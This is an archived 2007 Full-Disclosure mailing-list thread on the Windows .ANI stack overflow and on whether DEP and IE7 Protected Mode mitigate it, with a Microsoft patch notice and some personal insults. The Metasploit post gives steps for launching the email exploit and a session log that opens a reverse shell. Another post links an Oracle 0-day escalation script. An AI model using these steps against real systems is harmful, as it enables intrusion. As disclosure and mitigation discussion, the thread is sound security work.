mitigated the ANI exploit to a low-risk state that is non-persistent as soon as IE is closed. So with protected mode turned off, DEP not fully enabled (or missing NX hardware), the ANI exploit would be able to compromise the local user profile and data but it would still need to get around UAC if it wants to put a backdoor in Vista. George From nytrokiss at gmail.com Mon Apr 2 02:45:21 2007 From: nytrokiss at gmail.com (James Matthews) Date: Sun, 1 Apr 2007 18:45:21 -0700 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: <000301c774bf$3cf4a4f0$b6ddeed0$@net> References: <000301c774bf$3cf4a4f0$b6ddeed0$@net> Message-ID: <8a6b8e350704011845oef7abb3sfe0499acd8bb8498@mail.gmail.com> Windows security has allways been pockmarked On 4/1/07, George Ou wrote: > > "ad at heapoverflow.com said: > http://www.milw0rm.com/exploits/3634 > > str0ke told me to test this one and no miracle, it works under vista and > the > default DEP settings doesn't catch it." > > > Default DEP settings in Windows XP or Vista are worthless since it's off > for > all applications including IE7. I tested with DEP always-on and it > crashed > IE7 and the exploit failed. > > Note that when you manually launch an HTML from your hard drive, Protected > Mode is turned off because your HDD is considered a trusted source where > as > the public Internet is not. If I had try to browse a webpage with this > exploit, protected mode would have been turned on. I also had to manually > bypass the Active X warning to get the exploit to run and even then it > crashed with my fully-on DEP settings with hardware-enforcement. > > I don't really feel like turning off my DEP settings on my Vista machine > though I have a feeling that UAC would prevent it from rooting my system > though it could probably damage my files if it were coded to do that. But > I > had to go out of my way to get this exploit to run by manually downloading > the zip and manually enabling the ActiveX control just to get it to crash > my > browser. > > So I think it's fair to say that hardware-enforced fully-enabled DEP will > defeat the ANI exploit (in the current generic state) all by itself. > Protected Mode would have also mitigated the ANI exploit to a low-risk > state > that is non-persistent as soon as IE is closed. > > So with protected mode turned off, DEP not fully enabled (or missing NX > hardware), the ANI exploit would be able to compromise the local user > profile and data but it would still need to get around UAC if it wants to > put a backdoor in Vista. > > > > George > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- http://www.goldwatches.com/watches.asp?Brand=39 http://www.wazoozle.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070401/999cc8cc/attachment.html From dudevanwinkle at gmail.com Mon Apr 2 02:58:51 2007 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Sun, 1 Apr 2007 21:58:51 -0400 Subject: [Full-disclosure] April 1 joke In-Reply-To: <2ab70b460704011332pad5ebb9hc929cfffdd11b4e7@mail.gmail.com> References: <969102.78862.qm@web63807.mail.re1.yahoo.com> <829b2de40704010857r36039546hf768297bec5e5612@mail.gmail.com> <8a6b8e350704011140w429d3a8cn4d767726e6f571b@mail.gmail.com> <2ab70b460704011332pad5ebb9hc929cfffdd11b4e7@mail.gmail.com> Message-ID: On 4/1/07, Matti Ranta wrote: > > I don't know how to use vi what do i do use vim :-P -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070401/155225e0/attachment.html From Larry at larryseltzer.com Mon Apr 2 03:30:38 2007 From: Larry at larryseltzer.com (Larry Seltzer) Date: Sun, 1 Apr 2007 22:30:38 -0400 Subject: [Full-disclosure] MS Patch Coming Tuesday Message-ID: <0273B67044957C41BD71D12EBA2E00AE0FD329@becca.LarrySeltzer.local> http://www.microsoft.com/technet/security/bulletin/advance.mspx Microsoft Security Bulletin Advance Notification Updated: April 1, 2007 As part of the monthly security bulletin release cycle, Microsoft provides advance notification to our customers on the number of new security updates being released, the products affected, the aggregate maximum severity and information about detection tools relevant to the update. This is intended to help our customers plan for the deployment of these security updates more effectively. In addition, to help customers prioritize monthly security updates with any non-security updates released on Microsoft Update, Windows Update, Windows Server Update Services and Software Update Services on the same day as the monthly security bulletins, we also provide: * Information about the release of updated versions of the Microsoft Windows Malicious Software Removal Tool. * Information about the release of NON-SECURITY, High Priority updates on Microsoft Update (MU), Windows Update (WU), Windows Server Update Services (WSUS) and Software Update Services (SUS). Note that this information will pertain ONLY to updates on Microsoft Update, Windows Update, Windows Server Update Services and Software Update Services and only about High Priority, non-security updates being released on the same day as security updates. Information will NOT be provided about Non-security updates released on other days. On Tuesday 3 April 2007 Microsoft is planning to release: Security Updates * One Microsoft Security Bulletin affecting Microsoft Windows. The highest Maximum Severity rating for these is Critical. These updates will require a restart. These updates will be detectable using the Microsoft Baseline Security Analyzer. Microsoft Windows Malicious Software Removal Tool * Microsoft will not release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services and the Download Center on Tuesday 3 April 2007. Non-security High Priority updates on MU, WU, WSUS and SUS * Microsoft will not release any NON-SECURITY High-Priority Updates for Windows on Windows Update (WU) and Software Update Services (SUS) on Tuesday 3 April 2007. * Microsoft will not release any NON-SECURITY High-Priority Updates on Microsoft Update (MU) and Windows Server Update Services (WSUS) on Tuesday 3 April 2007. Although we do not anticipate any changes, the number of bulletins, products affected, restart information and severities are subject to change until released. Microsoft will host a webcast next week to address customer questions on these bulletins. For more information on this webcast please see below: * TechNet Webcast: Information about Microsoft's Security Bulletins * Wednesday, 11 April 2007 11:00 AM (GMT-08:00) Pacific Time (US & Canada) * http://msevents.microsoft.com/CUI/WebCastEventDetails.aspx?EventID=10323 27017&EventCategory=4&culture=en-US&CountryCode=US At this time no additional information on these bulletins such as details regarding severity or details regarding the vulnerability will be made available until 3 April 2007. From BlueBoar at thievco.com Mon Apr 2 04:24:17 2007 From: BlueBoar at thievco.com (Blue Boar) Date: Sun, 01 Apr 2007 20:24:17 -0700 Subject: [Full-disclosure] [funsec] MS Patch Coming Tuesday In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD329@becca.LarrySeltzer.local> References: <0273B67044957C41BD71D12EBA2E00AE0FD329@becca.LarrySeltzer.local> Message-ID: <46107761.9040300@thievco.com> http://blogs.technet.com/msrc/archive/2007/04/01/latest-on-security-update-for-microsoft-security-advisory-935423.aspx Larry Seltzer wrote: > http://www.microsoft.com/technet/security/bulletin/advance.mspx > > Microsoft Security Bulletin Advance Notification > Updated: April 1, 2007 > > As part of the monthly security bulletin release cycle, Microsoft > provides advance notification to our customers on the number of new > security updates being released, the products affected, the aggregate > maximum severity and information about detection tools relevant to the > update. This is intended to help our customers plan for the deployment > of these security updates more effectively. > > In addition, to help customers prioritize monthly security updates with > any non-security updates released on Microsoft Update, Windows Update, > Windows Server Update Services and Software Update Services on the same > day as the monthly security bulletins, we also provide: > > * Information about the release of updated versions of the Microsoft > Windows Malicious Software Removal Tool. > > * Information about the release of NON-SECURITY, High Priority updates > on Microsoft Update (MU), Windows Update (WU), Windows Server Update > Services (WSUS) and Software Update Services (SUS). > > > Note that this information will pertain ONLY to updates on Microsoft > Update, Windows Update, Windows Server Update Services and Software > Update Services and only about High Priority, non-security updates being > released on the same day as security updates. Information will NOT be > provided about Non-security updates released on other days. > > On Tuesday 3 April 2007 Microsoft is planning to release: > > Security Updates > > * One Microsoft Security Bulletin affecting Microsoft Windows. The > highest Maximum Severity rating for these is Critical. These updates > will require a restart. These updates will be detectable using the > Microsoft Baseline Security Analyzer. > > > Microsoft Windows Malicious Software Removal Tool > > * Microsoft will not release an updated version of the Microsoft Windows > Malicious Software Removal Tool on Windows Update, Microsoft Update, > Windows Server Update Services and the Download Center on Tuesday 3 > April 2007. > > > Non-security High Priority updates on MU, WU, WSUS and SUS > > * Microsoft will not release any NON-SECURITY High-Priority Updates for > Windows on Windows Update (WU) and Software Update Services (SUS) on > Tuesday 3 April 2007. > > * Microsoft will not release any NON-SECURITY High-Priority Updates on > Microsoft Update (MU) and Windows Server Update Services (WSUS) on > Tuesday 3 April 2007. > > > Although we do not anticipate any changes, the number of bulletins, > products affected, restart information and severities are subject to > change until released. > > Microsoft will host a webcast next week to address customer questions on > these bulletins. For more information on this webcast please see below: > > * TechNet Webcast: Information about Microsoft's Security Bulletins > > * Wednesday, 11 April 2007 11:00 AM (GMT-08:00) Pacific Time (US & > Canada) > > * > http://msevents.microsoft.com/CUI/WebCastEventDetails.aspx?EventID=10323 > 27017&EventCategory=4&culture=en-US&CountryCode=US > > > At this time no additional information on these bulletins such as > details regarding severity or details regarding the vulnerability will > be made available until 3 April 2007. > > > _______________________________________________ > Fun and Misc security discussion for OT posts. > https://linuxbox.org/cgi-bin/mailman/listinfo/funsec > Note: funsec is a public and open mailing list. > From haroon at sensepost.com Mon Apr 2 05:21:08 2007 From: haroon at sensepost.com (Haroon Meer) Date: Mon, 02 Apr 2007 06:21:08 +0200 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow -> Its ok, its in IE Protected Mode In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> Message-ID: <461084B4.6050201@sensepost.com> Hi Larry.. Larry Seltzer wrote: > I'm beginning to think that web-based attacks with this in Vista aren't > really so scary. Even if you can get them to execute what can you really > do in IE protected mode? You need to get the user to run the ANI outside > of IE. Assuming a compromised IE session is relatively harmless is pretty dangerous.While low privileged browsing is a welcome idea it is unfortunately (mostly) a solution to yesterdays problem. In the past we used to worry about zillions of machines being compromised and becoming zombies. Today, we are realizing more and more that its all about the data. ex: I run as mh on my machine. Everything of value on my machine is accessible to me. My music, my videos, my documents, my email, etc. Getting root/system on my machine gets you bragging rights, but if you were serious about hurting me, then mh is the only account you really need to compromise. By default, IE uses a NoWriteUp policy. Meaning that a low IL mh shell still gets to read everything of mh's by default (Check out Mark Minasi's chml to convert this to a more secure NoReadUp : http://www.minasi.com/vista/chml.htm) A low integrity shell (as a result of an IE compromise) may not be able to write files to most locations on my machine, and so prevents my machine from being "owned" in the traditional sense, but wont stop me from losing all of my data. /mh -- Haroon Meer, SensePost Information Security PGP: http://www.sensepost.com/pgp/haroon.txt Tel: +27 83786 6637 ** CRM114 Whitelisted by: From haroon at sensepost.com ** From fdlist at digitaloffense.net Mon Apr 2 08:03:04 2007 From: fdlist at digitaloffense.net (H D Moore) Date: Mon, 2 Apr 2007 02:03:04 -0500 Subject: [Full-disclosure] Metasploit vs ANI Message-ID: <200704020203.04573.fdlist@digitaloffense.net> Two new exploit modules are available for version 3.0 of the Metasploit Framework. These modules can be obtained by using the 'Online Update' feature in Windows and the 'svn update' command on Unix-like systems. Matt Miller posted to the Metasploit Blog about our ANI efforts: http://blog.metasploit.com/ The two exploits can be viewed in the svn repository at metasploit.com: http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ani_loadimage_chunksize.rb http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/email/ani_loadimage_chunksize.rb The first module exploits the ANI flaw through Internet Explorer. It uses multiple icon files referenced from a single HTML page. This allows client-side brute forcing without resorting to javascript. This module will execute code on Windows 2000, Windows XP, and Windows Vista using the default target. As mentioned in the blog, a command shell is not directly accessible on Vista, but the Meterpreter payload can be used to bust out of the low-privileged process :-) The second module exploits the ANI flaw through Outlook and Outlook Express. It sends a multipart MIME e-mail that contains multiple icons files referenced from a HTML message. This allows brute forcing of the correct target via the mail reader, all without any form of client-side scripting. To use this module, point RHOST and RPORT at a SMTP server that will relay your email. Set the MAILFROM and MAILTO options, select a payload, launch the exploit, and wait for your payload to execute. An example session from the e-mail based exploit module: msf exploit(ani_loadimage_chunksize) > exploit [*] Started reverse handler [*] Connecting to SMTP server localhost:20025... [*] SMTP: 220 slug.metasploit.com ESMTP [*] SMTP: 250-slug.metasploit.com 250-PIPELINING 250-8BITMIME 250-AUTH LOGIN PLAIN CRAM-MD5 250 SIZE 0 [*] SMTP: 250 ok [*] SMTP: 250 ok [*] Sending the message (404759 bytes)... [*] SMTP: 354 go ahead [*] SMTP: 250 ok 1175497222 qp 12648 [*] Closing the connection... [*] SMTP: 221 slug.metasploit.com [*] Waiting for a payload session (backgrounding)... [*] Exploit running as background job. msf exploit(ani_loadimage_chunksize) > [*] Command shell session 1 opened (192.168.0.127:4444 -> 192.168.0.127:37299) msf exploit(ani_loadimage_chunksize) > sessions -i 1 [*] Starting interaction with 1... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\program files\Outlook Express> Enjoy! - The Metasploit Staff From george_ou at lanarchitect.net Mon Apr 2 08:29:13 2007 From: george_ou at lanarchitect.net (George Ou) Date: Mon, 2 Apr 2007 00:29:13 -0700 Subject: [Full-disclosure] Metasploit vs ANI In-Reply-To: <200704020203.04573.fdlist@digitaloffense.net> References: <200704020203.04573.fdlist@digitaloffense.net> Message-ID: <005801c774f8$9ec831e0$dc5895a0$@net> HD, I realize that DEP is disabled for Explorer and the browser by default, but I have it enabled and enforced by hardware XD/NX and it stopped the Milw0rm PoC. Do you or anyone else have a PoC that can get around this type of fully-enabled hardware-enforced DEP? I also realize that Protected Mode in IE7 does not prevent arbitrary code execution, but it does prevent that code from interacting with user or system files and it can't be persistent if that infected instance of IE7 is closed. From what I understand, owning the IE7 process in protected mode is bad in the sense that it lets you steal data from web pages or user input (such as password entry), but it doesn't let you capture keyboard input from other application or system processes. Am I missing something here or does someone out there have a PoC that can get around these limitations? George -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of H D Moore Sent: Monday, April 02, 2007 12:03 AM To: full-disclosure at lists.grok.org.uk Subject: [Full-disclosure] Metasploit vs ANI Two new exploit modules are available for version 3.0 of the Metasploit Framework. These modules can be obtained by using the 'Online Update' feature in Windows and the 'svn update' command on Unix-like systems. Matt Miller posted to the Metasploit Blog about our ANI efforts: http://blog.metasploit.com/ The two exploits can be viewed in the svn repository at metasploit.com: http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/ ani_loadimage_chunksize.rb http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/email/an i_loadimage_chunksize.rb The first module exploits the ANI flaw through Internet Explorer. It uses multiple icon files referenced from a single HTML page. This allows client-side brute forcing without resorting to javascript. This module will execute code on Windows 2000, Windows XP, and Windows Vista using the default target. As mentioned in the blog, a command shell is not directly accessible on Vista, but the Meterpreter payload can be used to bust out of the low-privileged process :-) The second module exploits the ANI flaw through Outlook and Outlook Express. It sends a multipart MIME e-mail that contains multiple icons files referenced from a HTML message. This allows brute forcing of the correct target via the mail reader, all without any form of client-side scripting. To use this module, point RHOST and RPORT at a SMTP server that will relay your email. Set the MAILFROM and MAILTO options, select a payload, launch the exploit, and wait for your payload to execute. An example session from the e-mail based exploit module: msf exploit(ani_loadimage_chunksize) > exploit [*] Started reverse handler [*] Connecting to SMTP server localhost:20025... [*] SMTP: 220 slug.metasploit.com ESMTP [*] SMTP: 250-slug.metasploit.com 250-PIPELINING 250-8BITMIME 250-AUTH LOGIN PLAIN CRAM-MD5 250 SIZE 0 [*] SMTP: 250 ok [*] SMTP: 250 ok [*] Sending the message (404759 bytes)... [*] SMTP: 354 go ahead [*] SMTP: 250 ok 1175497222 qp 12648 [*] Closing the connection... [*] SMTP: 221 slug.metasploit.com [*] Waiting for a payload session (backgrounding)... [*] Exploit running as background job. msf exploit(ani_loadimage_chunksize) > [*] Command shell session 1 opened (192.168.0.127:4444 -> 192.168.0.127:37299) msf exploit(ani_loadimage_chunksize) > sessions -i 1 [*] Starting interaction with 1... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\program files\Outlook Express> Enjoy! - The Metasploit Staff _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From asotirov at determina.com Mon Apr 2 09:49:42 2007 From: asotirov at determina.com (Alexander Sotirov) Date: Mon, 02 Apr 2007 01:49:42 -0700 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> Message-ID: <4610C3A6.1060901@determina.com> Larry Seltzer wrote: > Perhaps your exploit proves this wrong, but it's the last I heard on the > subject. And even if there are only 256 slots how do you try more than > one? Isn't the first wrong one going to crash the browser? Read our advisory: http://www.determina.com/security.research/vulnerabilities/ani-header.html It explains that the vulnerable code is wrapped in an exception handler that recovers from access violations. That means that you can trigger the exploit multiple times and try different addresses, increasing the chance of hitting the right one (you only need 128 tries on average) A much simpler solution is to use heap spraying (which works fine on Vista) for systems that don't have DEP enabled. > As for the exploits in protected mode I'm sure there are things you can > do, but it's a huge step down from what you can do in XP and it's gone > as soon as you exit IE7 Unless somebody has a Vista exploit for the CSRSS kernel bug :-) In general I agree that protected mode presents additional constraints on exploitation, but I would reserve judgment until we've seen a few more exploits and more public research. Alex From bunker at fastwebnet.it Mon Apr 2 11:33:12 2007 From: bunker at fastwebnet.it (Andrea "bunker" Purificato) Date: Mon, 02 Apr 2007 12:33:12 +0200 Subject: [Full-disclosure] 0day Oracle 10g exploit - dbms_aq.enqueue - become DBA Message-ID: <1175509992.7527.6.camel@fin> [0-day] Remote Oracle DBMS_AQ.ENQUEUE exploit (10g) Grant or revoke dba permission to unprivileged user Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" AUTHOR: Andrea "bunker" Purificato http://rawlab.mindcreations.com DATE: Mon Apr 2 11:54:22 CEST 2007 PATCH: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html (CVE-2007-0268 ?) You can find the evil code here: http://rawlab.mindcreations.com/codes/exp/oracle/dbms_aq-enqueue.pl Regards, -- Andrea "bunker" Purificato +++++++++++[>++++++>+++++++++++++++++++++++++++++++++>++++ ++++++<<<-]>.>++++++++++.>.<----------.>---------.<+++++++. http://rawlab.mindcreations.com From Thierry at Zoller.lu Mon Apr 2 14:56:35 2007 From: Thierry at Zoller.lu (Thierry Zoller) Date: Mon, 2 Apr 2007 15:56:35 +0200 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: <4610C3A6.1060901@determina.com> References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> <4610C3A6.1060901@determina.com> Message-ID: <172274887.20070402155635@Zoller.lu> Dear Alexander Sotirov, AS> A much simpler solution is to use heap spraying (which works fine on Vista) for AS> systems that don't have DEP enabled. Are we talking Sofware DEP or Hardware enforce DEP ? -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 From Larry at larryseltzer.com Mon Apr 2 15:06:21 2007 From: Larry at larryseltzer.com (Larry Seltzer) Date: Mon, 2 Apr 2007 10:06:21 -0400 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: <172274887.20070402155635@Zoller.lu> References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> <4610C3A6.1060901@determina.com> <172274887.20070402155635@Zoller.lu> Message-ID: <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local> AS> A much simpler solution is to use heap spraying (which works fine on AS> Vista) for systems that don't have DEP enabled. TZ> Are we talking Sofware DEP or Hardware enforce DEP ? Heap spraying implies running code in the heap, which any DEP should block. There are all kinds of software techniques that would detect heap spraying. I'm sure any HIPS would block it. But like DEP they're not on in Windows by default. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.eweek.com/blogs/larry%5Fseltzer/ Contributing Editor, PC Magazine larryseltzer at ziffdavis.com From hailtheczar at gmail.com Mon Apr 2 15:12:39 2007 From: hailtheczar at gmail.com (Jason Areff) Date: Mon, 2 Apr 2007 09:12:39 -0500 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local> References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> <4610C3A6.1060901@determina.com> <172274887.20070402155635@Zoller.lu> <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local> Message-ID: On 4/2/07, Larry Seltzer wrote: > > AS> A much simpler solution is to use heap spraying (which works fine on > > AS> Vista) for systems that don't have DEP enabled. > TZ> Are we talking Sofware DEP or Hardware enforce DEP ? > > Heap spraying implies running code in the heap, Actually, um.. no.. it doesn't which any DEP should > block. There are all kinds of software techniques that would detect heap > spraying. I'm sure any HIPS would block it. Most likely not with regard to sotirov's new heap library stuff. Larry Seltzer > eWEEK.com Security Center Editor > http://security.eweek.com/ > http://blog.eweek.com/blogs/larry%5Fseltzer/ > Contributing Editor, PC Magazine > larryseltzer at ziffdavis.com How do you get to be in that position? Lot's of buzzword-tossing I'd have to guess. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070402/e8edc798/attachment.html From Larry at larryseltzer.com Mon Apr 2 15:24:52 2007 From: Larry at larryseltzer.com (Larry Seltzer) Date: Mon, 2 Apr 2007 10:24:52 -0400 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> <4610C3A6.1060901@determina.com> <172274887.20070402155635@Zoller.lu> <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local> Message-ID: <0273B67044957C41BD71D12EBA2E00AE0FD336@becca.LarrySeltzer.local> LS>Heap spraying implies running code in the heap, JA>Actually, um.. no.. it doesn't My understanding of heap spraying comes from http://blogs.securiteam.com/index.php/archives/638: "...SkyLined's heap spraying techqniue (http://sf-freedom.blogspot.com/2006/07/heap-spraying-internet-exploiter .html) (the concept of this technique is that you inject the nop + shellcode into the heap memory and use some method to trick the eip jump into that heap ..." Sure sounds like running code in the heap to me. JA>How do you get to be in that position? Lot's of buzzword-tossing I'd have to guess. Fuck you too. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.eweek.com/blogs/larry%5Fseltzer/ Contributing Editor, PC Magazine larryseltzer at ziffdavis.com From hailtheczar at gmail.com Mon Apr 2 15:26:58 2007 From: hailtheczar at gmail.com (Jason Areff) Date: Mon, 2 Apr 2007 09:26:58 -0500 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD336@becca.LarrySeltzer.local> References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> <4610C3A6.1060901@determina.com> <172274887.20070402155635@Zoller.lu> <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD336@becca.LarrySeltzer.local> Message-ID: On 4/2/07, Larry Seltzer wrote: > > LS>Heap spraying implies running code in the heap, > JA>Actually, um.. no.. it doesn't > > My understanding of heap spraying comes from > http://blogs.securiteam.com/index.php/archives/638: "...SkyLined's heap > spraying techqniue > (http://sf-freedom.blogspot.com/2006/07/heap-spraying-internet-exploiter > .html) (the concept of this technique is that you inject the nop + > shellcode into the heap memory and use some method to trick the eip jump > into that heap ..." > > Sure sounds like running code in the heap to me. "Heap spraying" is filling the heap with controllable data... This is simply allocating things in the heap. NOT running code. You are trying to say that once you jump into that code via some exploit (NOT part of the heap spraying technique itself) THEN you are "running code in the heap". JA>How do you get to be in that position? Lot's of buzzword-tossing I'd > have to guess. > > Fuck you too. > > Larry Seltzer > eWEEK.com Security Center Editor > http://security.eweek.com/ > http://blog.eweek.com/blogs/larry%5Fseltzer/ > > > Contributing Editor, PC Magazine > larryseltzer at ziffdavis.com > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070402/83758a4a/attachment.html From Larry at larryseltzer.com Mon Apr 2 15:30:13 2007 From: Larry at larryseltzer.com (Larry Seltzer) Date: Mon, 2 Apr 2007 10:30:13 -0400 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> <4610C3A6.1060901@determina.com> <172274887.20070402155635@Zoller.lu> <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD336@becca.LarrySeltzer.local> Message-ID: <0273B67044957C41BD71D12EBA2E00AE0FD337@becca.LarrySeltzer.local> >>"Heap spraying" is filling the heap with controllable data... This is simply allocating things in the heap. NOT running code. >>You are trying to say that once you jump into that code via some exploit (NOT part of the heap spraying technique itself) THEN you are "running code in the heap". What's the point of spraying the heap if you're not going to jump into it? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.eweek.com/blogs/larry%5Fseltzer/ Contributing Editor, PC Magazine larryseltzer at ziffdavis.com -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070402/ce24f5b4/attachment.html From Thierry at Zoller.lu Mon Apr 2 15:32:20 2007 From: Thierry at Zoller.lu (Thierry Zoller) Date: Mon, 2 Apr 2007 16:32:20 +0200 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local> References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> <4610C3A6.1060901@determina.com> <172274887.20070402155635@Zoller.lu> <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local> Message-ID: <977664272.20070402163220@Zoller.lu> Dear Larry Seltzer, I did not ask to have an explanation about Heap based exploits. LS>I'm sure any HIPS would block it. But like DEP they're not on LS> in Windows by default. That's where you are wrong larry, if you have an NX capable CPU ("hardware enforced") DEP is turned on by default on all and every process. Software DEP is not really DEP it's more like SafeSEH... -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 From Larry at larryseltzer.com Mon Apr 2 15:53:21 2007 From: Larry at larryseltzer.com (Larry Seltzer) Date: Mon, 2 Apr 2007 10:53:21 -0400 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: <977664272.20070402163220@Zoller.lu> References: <0273B67044957C41BD71D12EBA2E00AE0FD30D@becca.LarrySeltzer.local> <0273B67044957C41BD71D12EBA2E00AE0FD314@becca.LarrySeltzer.local> <46100B19.2040904@immunityinc.com> <0273B67044957C41BD71D12EBA2E00AE0FD31B@becca.LarrySeltzer.local> <4610C3A6.1060901@determina.com> <172274887.20070402155635@Zoller.lu> <0273B67044957C41BD71D12EBA2E00AE0FD334@becca.LarrySeltzer.local> <977664272.20070402163220@Zoller.lu> Message-ID: <0273B67044957C41BD71D12EBA2E00AE0FD33A@becca.LarrySeltzer.local> >>That's where you are wrong larry, if you have an NX capable CPU ("hardware enforced") DEP is turned on by default on all and every process. Software DEP is not really DEP it's more like SafeSEH... See http://support.microsoft.com/default.aspx/kb/875352 ("A detailed description of the Data Execution Prevention (DEP) feature in Windows XP Service Pack 2...") "OptIn - This setting is the default configuration. On systems with processors that can implement hardware-enforced DEP, DEP is enabled by default for limited system binaries and programs that "opt-in." With this option, only Windows system binaries are covered by DEP by default. " I'm almost positive that the limited system binaries do not include Internet Explorer. At the time they made this configuration decision too many controls were broken by turning on DEP by default. And the policy is the same in Vista. For now. Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blog.eweek.com/blogs/larry%5Fseltzer/ Contributing Editor, PC Magazine larryseltzer at ziffdavis.com From Thierry at Zoller.lu Mon Apr 2 16:06:39 2007 From: Thierry at Zoller.lu (Thierry Zoller) Date: Mon, 2 Apr 2007 17:06:39 +0200 Subject: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow In-Reply-To: 